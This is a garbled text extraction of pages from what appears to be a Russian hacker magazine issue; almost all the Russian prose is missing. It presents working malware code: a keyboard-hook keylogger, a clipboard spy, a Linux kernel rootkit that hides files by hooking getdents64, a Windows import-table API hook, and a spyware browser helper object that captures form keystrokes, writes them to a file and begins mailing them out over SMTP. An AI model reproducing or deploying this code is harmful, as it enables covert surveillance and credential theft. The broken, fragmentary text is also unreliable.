@Tmp[1], Length(Tmp)); S := ' "'+copy(Tmp, 1, Res)+'"'; // GetKeyboardState(KeyState); // Res := ToAscii(VirtCode, ScanCode, KeyState, @Tmp[1], 0); if Res > 0 then S := S + ' = "'+copy (Tmp, 1, Res)+'"'; end; else S := 'message '+IntToHex(EventMsg^.message, 4); end; Form1.Memo1.Lines.Add(s); end; Result := CallNextHookEx (HookHandle, nCode, wParam, LParam); end; . nCode HC_ACTION, EventMsg. paramL X- , paramH Y. paramL ( -, ), paramH 15- . . API GetKeyNameText ToAscii, -. paramL, . ((EventMsg^.paramL and $FF00) shl 8 , - 16..23. 8..15 paramL, , 8 . GetKeyNameText , ToAscii : GetKeyboardState, -

10 06: 1

: . . .

www.xakep.ru

45

ToAscii. GetKeyboardState 256 . . , . , . WM_CANCELJOURNAL. , WM_CANCELJOURNAL . procedure TForm1.OnAppMessage (var Msg: TMsg; var Handled: Boolean); begin if (Msg.message = WM_CANCELJOURNAL) and (HookHandle INVALID_HANDLE_VALUE) then begin HookHandle := INVALID_HANDLE_VALUE; InstallHook; Memo1.Lines.Add ('>'); Handled := true; end; end; procedure TForm1.FormCreate(Sender: TObject); begin Application.OnMessage := OnAppMessage; InstallHook; end; , , Windows 9x NT, DLL. : 1 , . 2 WH_DEBUG. , . , . , . : 1 . , , . 2 SetClipboardViewer . -

. 3 , . SetClipboardViewer , . . SetClipboardViewer . , SetClipboardViewer , SetClipboardViewer . WM_DRAWCLIPBOARD . , ( !) . , , , . , - , . ChangeClipboardChain, . WM_CHANGECBCHAIN , , . . , . : procedure TCMForm.FormCreate (Sender: TObject); begin hNextClipboardViewer := SetClipboardViewer(Handle); if hNextClipboardViewer > 0 then Memo1.Lines.Add(' . Next hWnd = '+IntToHex (hNextClipboardViewer, 8)) else Memo1.Lines.Add(' GetLastError = '+IntToStr(GetLastError)); end; procedure TCMForm.FormDestroy (Sender: TObject); begin ChangeClipboardChain (Handle, hNextClipboardViewer); end; WM_CHANGECBCHAIN WM_DRAWCLIPBOARD, :

procedure WMCHANGECBCHAIN(var Message: TWMCHANGECBCHAIN); message WM_CHANGECBCHAIN; procedure WMDRAWCLIPBOARD(var Message: TMessage); message WM_DRAWCLIPBOARD; WM_CHANGECBCHAIN , : procedure TCMForm.WMCHANGECBCHAIN (var Message: TWMCHANGECBCHAIN); begin // , ? if Message.Remove = hNextClipboardViewer then hNextClipboardViewer := Message.Next; SendMessage (hNextClipboardViewer, Message.Msg, Message.Remove, Message.Next); end; , WM_DRAWCLIPBOARD , . : procedure TCMForm.WMDRAWCLIPBOARD(var Message: TMessage); begin // Memo1.Lines.Add(clipboard.AsText); Memo1.Lines.Add('--------------'); // SendMessage (hNextClipboardViewer, Message.Msg, Message.WParam, Message.LParam); end; . . . , . , . . 100% . , , KeServiceDescriptorTableShadow . !

46 09- 06

: . . : , SPYWARE, , , . , , , . semuha@mail.ru

. . . , Creeper I'm the creeper : catch me if you can. . , , . 1986 . Brain IBM- . . Brain . Brain

, , , ! ? , Brain . 90- . , ? Chameleon, . , . , ,

, , . , . , 90- . -, , . Dark Avenger. MtE.

47

. , . , Peach, 1992 , . , . , , backdoors. 1998 BackOrifice (Backdoor.BO), () . 2000 , BackOrifice BO2k, -

, . - ZippedFiles, , Neolite. Neolite ( , , , PKZip LZExe. . ). , ,

, . , . . , , , XX , , . , , , . , , ?

48 09- 06

, , , , . ( :)). . , , . -

DRM- SONY. FIRST 4 INTERNET. , . . , . , , $SYS$, . BACKDOOR.WIN32.BREPLIBOT.B, . - , $SYS$ ($SYS$DRV.EXE). , DRM- SONY . BREPLIBOT , . , , .

, , , -. , , , . : , , IM, , ntfs . . , UNIX , Windows, rootkit, stealth-, Windows. , ifconfig, ps, top, login, ls, netstat, libproc.a. , . , . , , , syslogd; , . , . . 1 LKM. , , . 2 . , , autofs, md5, scisi_mod, floppy. . 3 , . , , , . /dev/kmem. LKM, . , , . . , . , , :

. url- Paypal.

#include struct dirent *dirstr; DIR * mydir=opendir("/tmp"); dirstr=readdir(mydir); ltrace , : SYS_getdents64(3, 0x08049678, 4096, 0x40014400, 0x4014c2c0) getdents64 , struct dirent. - , getdents64, dirent d_reclen d_name, , . . // #include #include #include #include #include #include #include #include extern void *sys_call_table[]; int (*real_getd)(u_int fil, struct dirent *dirp, u_int cnt); // int our_getd (u_int fil, struct dirent *dirp, u_int cnt) { // struct dirent64 { int d_ino1,d_ino2,d_off1,d_off2; unsigned short d_reclen; unsigned char d_type; char d_name[0]; } *dirp2, *dirp3; // , char file_hide[] = "file_to_hide"; // unsigned int bak, n; int bak2; bak = (*real_getd)(fil,dirp,cnt); if (bak>0) {

49

// dirp2 = (struct dirent64 *) kmalloc(bak,GFP_KERNEL); copy_from_user(dirp2,dirp,bak); // dirp3 = dirp2; bak2 = bak; // while (bak2>0) { // d_reclet n = dirp3->d_reclen; bak2 -= n; // if (strstr((char *)&(dirp3->d_name), (char *)&file_hide) != NULL) { //

memcpy(dirp3, (char *) dirp3+dirp3->d_reclen, bak2); bak -= n; } // dirp3 = (struct dirent64 *) ((char *)dirp3+dirp3->d_reclen); } // copy_to_user(dirp,dirp2,bak); kfree(dirp2); } // return bak; } // C int init_module(void) { real_getd = sys_call_table[

SYS_getdents64]; sys_call_table [SYS_getdents64]=our_getd; return 0; } void cleanup_module() { sys_call_table [SYS_getdents64]=real_getd; } Windows . . , root, rootkit, . Windows : 1 . Windows -

0-day d , . zero-day , , . , , . , , fishing-, , . , ntfs. , Stream (ADS) NTFS. , . , cross-site scripting -(-, ), -

. , Yamanner 2006 200 - Yahoo!Mail. -. . . . , : xor , . . . - html- . , . Feebs Scano, ,

java-. - False positive, . C Feebs Scano , , html . , exe- .doc. , . . . . , 0-day. , , , , , . , IT-, , .

eEye Digital Security , . , . Next-Generation Security , - BIOS. ACPI, . Microsoft , . , . , . , BIOS , , . . , , .

50 09- 06

, . , . , , , , Task Manager. 2 API- dll. . dll: , , . , , DLL , , DLL , - . , API-. API- / , GetProcAddress, dll-, . . / , JUMP, . , , PE- . , , dll. . , . , , , . ExitWindowsEx : // , ExitWindowsEx DWORD ExitW_Addr; // dll- Substitute(). , , dll - , dll , DLL_PROCESS_ATTACH. BOOL APIENTRY DllMain(HANDLE hm, DWORD my_f, LPVOID lpcd) {

if(my_f == DLL_PROCESS_ATTACH) Substitute(); return TRUE; } // Substitute(), (.idata) . void Substitute (void) { // PE- BYTE *pimage = (BYTE*) GetModuleHandle(NULL); BYTE *pidata; IMAGE_DOS_HEADER *imdh; IMAGE_OPTIONAL_HEADER *imoh; IMAGE_SECTION_HEADER *imsh; IMAGE_IMPORT_DESCRIPTOR *imid; DWORD *imsd; // PE- imdh = (IMAGE_DOS_HEADER*)pimage; imoh = (IMAGE_OPTIONAL_HEADER*) (pimage + imdh->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER)); imsh = (IMAGE_SECTION_HEADER*) ((BYTE*)imoh + sizeof (IMAGE_OPTIONAL_HEADER)); // PE- if (imdh->e_magic != 0x5A4D) { printf(" PE-"); return -1; } // .idata for(int i=0; iName) , ".idata") == 0) break; if(i==16) { printf(" .idata"); return -1; } // .idata imid = (IMAGE_IMPORT_DESCRIPTOR*) (pimage + (imsh +i)->VirtualAddress ); // ExitW_Addr = (DWORD)GetProcAddress (GetModuleHandle("user32.dll"), "ExitWindowsEx"); if(ExitW_Addr == 0) { printf(NULL, " ExitW_Addr"); return -1; } // ExitWindowsEx user32.dll,

while(imid->Name) { if(strcmp((char*)(pimage + imid->Name), "USER32.dll") ==0 ) break; imid++; } // imsd = (DWORD*)( pimage + imid->FirstThunk); while (*imsd!=ExitW_Addr && *imsd!=0) imsd++; if(*imsd == 0) { printf("ExitW_Addr .idata"); return -1; } // DWORD func_b = (DWORD)&OurFunction; DWORD a; // VirtualProtect((void*)(imsd),4, PAGE_READWRITE, &a); // WriteProcessMemory(GetCurrentProcess(), (void*)(isd), (void*)&func_b,4,&written); // VirtualProtect((void*)(imsd),4,a, &a); if(written!=4) { printf(" "); return -1; } } // : BOOL WINAPI OurFunction(UINT uFl, DWORD dwR) { // , , . // ExitWindowsEx ((BOOL (__stdcall*)(HWND, char*, char*, UINT))ExitW_Addr)(uFlags, dwReason); return 0; } ? , , . . , http://en.wikipedia.org/wiki/Rootkit wikipedia http://www.chkrootkit.org chkrootkit

52 09- 06

SPYWARE BHOIE . ? , , . ( )? , , aka zOrd ICQ: 291637112, www.offbit.1gb.ru Browser Helper Object. , Browser Helper Object DLL, Windows Microsoft Internet Explorer ( Get Right, Flyswats, Quiver, Blink, iHarvest Godzilla). (helper ), , ( ), DLL , , BHO. BHO , Browser Helper Objects spyware. BHO . BHO COM, DLL , COM-, , , . IObjectWithSite IWebBrowser2, ! ,

- , . . , BHO, , . -? , , e-mail . , get_Document, IDispatch. IHTMLDocument2. , . BHO. , ? . Win32 Application, ALT COM, , ALT COM--

. Add ALT Objects Internet Explorer Object. , , . , BHO. , , : class ATL_NO_VTABLE CBHO: public CComObjectRootEx , public CComCoClass, public IObjectWithSiteImpl, public IDispatchImpl , :

53

public: STDMETHOD(SetSite)(IUnknown *pUnkSite); STDMETHOD(Invoke)(DISPID, REFIID, LCID, WORD, DISPPARAMS*, VARIANT*, EXCEPINFO*, UINT*); private: STDMETHOD(Connect)(void); CComQIPtr m_spWebBrowser2; CComQIPtr m_spCPC; DWORD m_dwCookie; , spyware . MSDN onkeypress ( MSDN 2005), get_onkeypress, IHTMLElement::onkeypress). . get_Document, IDispatch. : CComPtr pDisp; m_spWebBrowser2->get_Document(&pDesp); IHTMLDocument . : CComPtr spHTML; spHTML = pDisp; . get_body, spHTML. , , , spyware. IHTMLElement , / . . . , onkeypress: HTMLTextContainerEvents2 HTMLAnchorEvents2 HTMLFormElementEvents2 HTMLTableEvents2 , :

BHO Visual C++

#define BUFSIZE 4096 ... HTMLTextContainerEvents2-> onkeypress(&pDesp) ... BHO . , . - , ? ! URL . get_LocationURL, : BSTR wstr; m_spWebBrowser->get_LocationURL(&wstr); wstr , . . : DWORD dwBytesRead, dwBytesWritten, dwBufSize=BUFSIZE; #define BUFSIZE 4096 BOOL f_wf; f_wf=WriteFile(hTempFile, buffer, dwBytesRead, &dwBytesWritten, NULL); . , , . Browser Helper Object , . rgs. , ,

. , BHO , . , , CLSID TypeLib , BHO. , , BHO IE: HLKM {SOFTWARE {Microsoft {Windows {Current Version {Explorer {Browser Helper Objects {Force Remove {G4G53DNL-Q9LF-OV7D- 3753538543BVB7}=s SPYFORM }}}}}}} regsvr32 c /s /c DLL. ? , , . ? . , : #define BUFSIZE 4096 void WriteBuffer (void) { hFile = CreateFile("spyform.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

54 09- 06

... DWORD dwBytesRead; #define BUFSIZE 4096 BOOL f_rf; f_rf= ReadFile(hFile, buffer, 4096, &dwBytesRead, NULL) BYTE bBugIE[BUFSIZE]; ... CloseHandle(hFile); } SMPT. smpt-: SOCKET nSMTPServerSocket; struct sockaddr_in smtp_address; int nConnect; int iLength; int iMsg = 0; int iEnd = 0; BYTE sBuf[4096]; : char *MailMessage[] = { "HELO SpyForm\r\n", "MAIL FROM:\r\n", // "RCPT TO:\r\n", // "DATA\r\n", "